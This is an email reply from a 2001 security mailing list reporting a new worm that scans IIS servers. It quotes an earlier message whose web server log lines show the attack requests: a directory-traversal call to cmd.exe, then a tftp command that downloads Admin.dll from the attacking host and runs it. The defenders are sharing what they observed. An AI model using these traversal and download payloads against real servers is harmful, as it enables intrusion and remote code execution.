Seeing hits from this new worm, looks like it tries circa 30 URLs.
Logic looks similar to Code Red II/III, in that most hits are coming from similar class B and C networks.
Not sure of payload though as we're protected.
Regards,
Luke Butcher
Em: [EMAIL PROTECTED]
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 5:50 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Subject: Re: something new afoot, sweeping scans:
>
>
> I haven't been able to get a copy of the worm yet, but
> it scans IIS machines for vulnerabilities able to run
> cmd.exe?\dir+c, then if that works, sends an attempt
> to run tftp back to itself and grab "Admin.dll", then
> run it.
>
> Here are some logs:
>
> Tue Sep 18 09:43:13 2001: 38.214.180.8 -> x.x.1.29: 1888 ->
> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2460 ->
> 80 GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2038.21
4.180.8%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
> Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2500 ->
> 80 GET /scripts/..%252f../Admin.dll HTTP/1.0
E-mail Disclaimer
Nabarro Nathanson
Principal office:
Lacon House, Theobalds Road
London WC1X 8RW
Tel: +44 (0)20 7524 6000 Fax: +44(0)20 7524 6524
NOTICE
This message contains confidential (and potentially legally privileged) information solely for its intended recipients and others may not distribute, copy or use it. If you have received this communication in error please tell us either by return e-mail or at the numbers above and delete it, and any copies of it.
The contents of this e-mail are subject to the firms Terms of Business copies of which are available on our website.
We have taken steps to ensure that this message (and any attachments or hyperlinks contained within it) are free from computer viruses and the like. However, in accordance with good computing practice the recipient is responsible for ensuring that it is actually virus free before opening it.
Regulated by the Law Society. A list of partners is available at the address above or on our website, http://www.nabarro.com
